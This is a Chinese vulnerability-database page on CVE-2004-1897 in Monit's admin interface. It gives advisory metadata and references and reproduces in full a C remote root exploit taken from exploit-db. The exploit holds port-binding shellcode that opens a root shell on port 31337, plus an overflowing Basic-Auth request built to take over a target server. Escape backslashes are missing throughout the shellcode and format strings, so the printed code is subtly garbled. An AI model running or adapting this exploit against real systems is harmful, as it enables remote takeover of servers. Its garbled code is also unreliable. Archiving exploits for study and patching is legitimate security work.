多个Monit管理员接口远程漏洞

多个Monit管理员接口远程漏洞

漏洞ID 1107872 漏洞类型 未知
发布时间 2004-04-12 更新时间 2005-10-20
图片[1]-多个Monit管理员接口远程漏洞-安全小百科CVE编号 CVE-2004-1897
图片[2]-多个Monit管理员接口远程漏洞-安全小百科CNNVD-ID CNNVD-200412-868
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/174
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-868
|漏洞详情
Monit1.4至4.2的管理员接口存在漏洞。远程攻击者可以通过发送不带密码的基本认证请求导致服务拒绝(段错误),该漏洞导致Monit减少空指针并引起越界读取。
|漏洞EXP
/*
 * THE EYE ON SECURITY RESEARCH GROUP - INDIA
 *
 * www eos-india net poc 305monit.c
 * Remote Root Exploit for Monit <= 4.2
 * Vulnerability: Buffer overflow in handling of Basic Authentication informations.
 * Server authenticates clients through:
 * Authentication: Basic Base64Encode[UserName:Password]
 * Here we are exploiting the insecure handling of username in Basic Authentication information to return
 * control (EIP) to our payload.
 *
 * Nilanjan De [n2n linuxmail org] - Abhisek Datta [abhisek front ru]
 *
 * 06.04.2004
 * www eos-india net
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>

#define 	BUFF_SIZE	2048
#define		PADDING		40
#define		EXP_SIZE	(256+4+PADDING)
#define MAX_ARCH 2
struct eos{
	char *arch;
	unsigned long ret;
} targets[] = {
	"Monit-4.2-Gentoo",
	0xbf7fef02,
	//-------------------------------
	"Monit <=4.2 Crash",
	0xbadc0ded,
	NULL,
	0
};
/*
 x86 linux portbind a shell in port 31337
 based on shellcode from www.shellcode.com.ar
 with a few modifications by us
*/
 
char shellcode[]=
        /* sys_fork() */
	"x31xc0"                      // xorl         %eax,%eax
	"x31xdb"                      // xorl         %ebx,%ebx
	"xb0x02"                      // movb         $0x2,%al
	"xcdx80"                      // int          $0x80
	"x38xc3"                      // cmpl         %ebx,%eax
	"x74x05"                      // je           0x5
	/* sys_exit() */
	"x8dx43x01"                  // leal         0x1(%ebx),%eax
	"xcdx80"                      // int          $0x80
        /* setuid(0) */
        "x31xc0"                      // xorl         %eax,%eax
        "x31xdb"                      // xorl         %ebx,%ebx
        "xb0x17"                      // movb         $0x17,%al
        "xcdx80"                      // int          $0x80
        /* socket() */
        "x31xc0"                      // xorl    %eax,%eax
        "x89x45x10"                  // movl    %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
        "x40"                          // incl    %eax
        "x89xc3"                      // movl    %eax,%ebx(SYS_SOCKET = 0x1)
        "x89x45x0c"                  // movl    %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
        "x40"                          // incl    %eax
        "x89x45x08"                  // movl    %eax,0x8(%ebp)(AF_INET = 0x2)
	"x8dx4dx08"                  // leal    0x8(%ebp),%ecx
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
        "x89x45x08"                  // movl    %eax,0x8(%ebp)

        /* bind()*/
        "x43"                          // incl    %ebx(SYS_BIND = 0x2)
        "x66x89x5dx14"              // movw    %bx,0x14(%ebp)(AF_INET = 0x2)
	"x66xc7x45x16x7ax69"      // movw    $0x697a,0x16(%ebp)(port=31337)
        "x31xd2"                      // xorl    %edx,%edx
        "x89x55x18"                  // movl    %edx,0x18(%ebp)
        "x8dx55x14"                  // leal    0x14(%ebp),%edx
        "x89x55x0c"                  // movl    %edx,0xc(%ebp)
        "xc6x45x10x10"              // movb    $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
 
        /* listen() */
        "x40"                          // incl    %eax
        "x89x45x0c"                  // movl    %eax,0xc(%ebp)
        "x43"                          // incl    %ebx
        "x43"                          // incl    %ebx(SYS_LISTEN = 0x4)
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
 
        /* accept() */
        "x43"                          // incl    %ebx
        "x89x45x0c"                  // movl    %eax,0xc(%ebp)
        "x89x45x10"                  // movl    %eax,0x10(%ebp)
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
        "x89xc3"                      // movl    %eax,%ebx
 
        /* dup2() */
        "x31xc9"                      // xorl    %ecx,%ecx
        "xb0x3f"                      // movb    $0x3f,%al
        "xcdx80"                      // int     $0x80
        "x41"                          // incl    %ecx
        "x80xf9x03"                  // cmpb    $0x3,%cl
        "x75xf6"                      // jne     -0xa
 
        /* execve() */
        "x31xd2"                      // xorl    %edx,%edx
        "x52"                          // pushl   %edx
        "x68x6ex2fx73x68"          // pushl   $0x68732f6e
        "x68x2fx2fx62x69"          // pushl   $0x69622f2f
        "x89xe3"                      // movl    %esp,%ebx
        "x52"                          // pushl   %edx
        "x53"                          // pushl   %ebx
        "x89xe1"                      // movl    %esp,%ecx
        "xb0x0b"                      // movb    $0xb,%al
        "xcdx80";                     // int     $0x80

void show_help(char *pr00gie,u_short opt) {
	int i=0;
	printf("==========> THE EYE ON SECURITY RESEARCH GROUP <==========n");
	printf("Monit <= 4.2 Remote Root Exploitn");
	printf("n2n[at]linuxmail[dot]org - abhisek[at]front[dot]run");
	printf("http://www.eos-india.netnn");
	if(!opt)
		return;
	printf("[usage]n");
	printf("%s [Remote Host] [Remote Port] [Target]n",pr00gie);
	printf("[Available Targets]n");
	while(targets[i].arch != NULL) {
		printf("%d. - %st - %pn",(i),targets[i].arch,targets[i].ret);				
		i++;
	}
}
/* Base 64 code ripped from monit src */
/**
 * Base64 encode one byte
 */
static char encode(unsigned char u) {

  if(u < 26)  return 'A'+u;
  if(u < 52)  return 'a'+(u-26);
  if(u < 62)  return '0'+(u-52);
  if(u == 62) return '+';

  return '/';

}
/**
 * Base64 encode and return size data in 'src'. The caller must free the
 * returned string.
 * @param size The size of the data in src
 * @param src The data to be base64 encode
 * @return encoded string otherwise NULL
 */
char *encode_base64(int size, unsigned char *src) {

  int i;
  char *out, *p;

  if(!src)
    return NULL;

  if(!size)
    size= strlen((char *)src);

  out= (char *)malloc(sizeof(char)*size*4/3+4);

  p= out;

  for(i=0; i<size; i+=3) {

    unsigned char b1=0, b2=0, b3=0, b4=0, b5=0, b6=0, b7=0;

    b1 = src[i];

    if(i+1<size)
      b2 = src[i+1];

    if(i+2<size)
      b3 = src[i+2];

    b4= b1>>2;
    b5= ((b1&0x3)<<4)|(b2>>4);
    b6= ((b2&0xf)<<2)|(b3>>6);
    b7= b3&0x3f;

    *p++= encode(b4);
    *p++= encode(b5);

    if(i+1<size) {
      *p++= encode(b6);
    } else {
      *p++= '=';
    }

    if(i+2<size) {
      *p++= encode(b7);
    } else {
      *p++= '=';
    }

  }

  return out;

}


void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
	char *exp_buff;
	char *exp_buff_encoded;
	int i;
	if (!(exp_buff=(char*)malloc(EXP_SIZE))){
		perror("malloc()");
		exit(1);
	}
	
	memset(exp_buff,0x90,EXP_SIZE);
	strcpy(exp_buff+256-strlen(shellcode),shellcode);
	for(i=256;i<EXP_SIZE-5;i+=4)
		memcpy(exp_buff+i,magic,4);
	strcpy(exp_buff+EXP_SIZE-4,":x");
	exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);	
	memset(buff,0x00,size);
	sprintf(buff,"GET / HTTP/1.0rn");
	sprintf(buff,"%sHost: %srn",buff,host);
	sprintf(buff,"%sAuthorization: Basic %srnrnrn",buff,exp_buff_encoded);
	
}
int main(int argc,char *argv[]) {
	char *host;
	char *b;
	int rport;
	int sockfd;
	struct sockaddr_in sin;
	struct hostent *h;
	unsigned int n;
	unsigned long magic;
	if(argc != 4) {
		show_help(argv[0],1);
		exit(1);
	}
	host=argv[1];
	rport=(atoi(argv[2]));
	n=atoi(argv[3]);
	if((n >= MAX_ARCH)||(n<0)) {
		printf("- Invalid targetn");
		show_help(argv[0],1);
		exit(1);
		}
	magic=targets[n].ret;
	show_help(argv[0],0);
	printf("-Using RET %pn",magic);
	printf("Resolving %st",host);
	h=gethostbyname(host);
	if(!h) {
		printf("[ERROR]nUnable to resolve: %sn",host);
		exit(1);
	}
	else
	printf("[DONE]n");
	b=(char*)malloc(BUFF_SIZE);
	if(!b) {
		perror("malloc");
		exit(1);
	}
	sin.sin_addr=*((struct in_addr*)h->h_addr);
	sin.sin_family=AF_INET;
	sin.sin_port=htons((u_short)rport);
	if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
		perror("socket");
		exit(1);
	}
	printf("Connecting to %s:%dt",host,rport);
	if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
		printf("[ERROR]nUnable to connect: %s:%dn",host,rport);
		perror("connect");
		exit(1);
	}
	else
	printf("[DONE]n");
	make_http_request(b,BUFF_SIZE,host,&magic);
	if(send(sockfd,b,strlen(b),0) == strlen(b))
		printf("Successfully send exploit stringn");
	else
		printf("Failed sending exploit stringn");
	close(sockfd);
	return 0;
}




// milw0rm.com [2004-04-12]
|参考资料

来源:BID
名称:10051
链接:http://www.securityfocus.com/bid/10051
来源:SECUNIA
名称:11304
链接:http://secunia.com/advisories/11304
来源:BUGTRAQ
名称:20040405Advisory:MultipleVulnerabilitiesinMonit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108119149103696&w;=2
来源:XF
名称:monit-basic-auth-dos(15734)
链接:http://xforce.iss.net/xforce/xfdb/15734

相关推荐: PWC.CGI Syslog Format String Vulnerability

PWC.CGI Syslog Format String Vulnerability 漏洞ID 1103313 漏洞类型 Input Validation Error 发布时间 2001-03-23 更新时间 2001-03-23 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享